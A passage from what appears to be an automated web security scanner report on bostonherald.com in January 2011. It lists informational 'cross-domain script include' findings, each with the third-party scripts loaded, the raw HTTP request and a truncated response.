<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.663. http://www.bostonherald.com/news/international/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/international/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://img.video.ap.org/p/j/apovn.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/international/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:48:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.664. http://www.bostonherald.com/news/international/africa/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/international/africa/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.665. http://www.bostonherald.com/news/national/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://img.video.ap.org/p/j/apovn.js

Request

GET /news/national/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.666. http://www.bostonherald.com/news/national/general/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/general/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.667. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.668. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.669. http://www.bostonherald.com/news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:44:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.670. http://www.bostonherald.com/news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:44:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.671. http://www.bostonherald.com/news/obituaries/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/obituaries/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/obituaries/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 50573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.672. http://www.bostonherald.com/news/offbeat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/offbeat/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://img.video.ap.org/p/j/apovn.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/offbeat/ HTTP/1.1
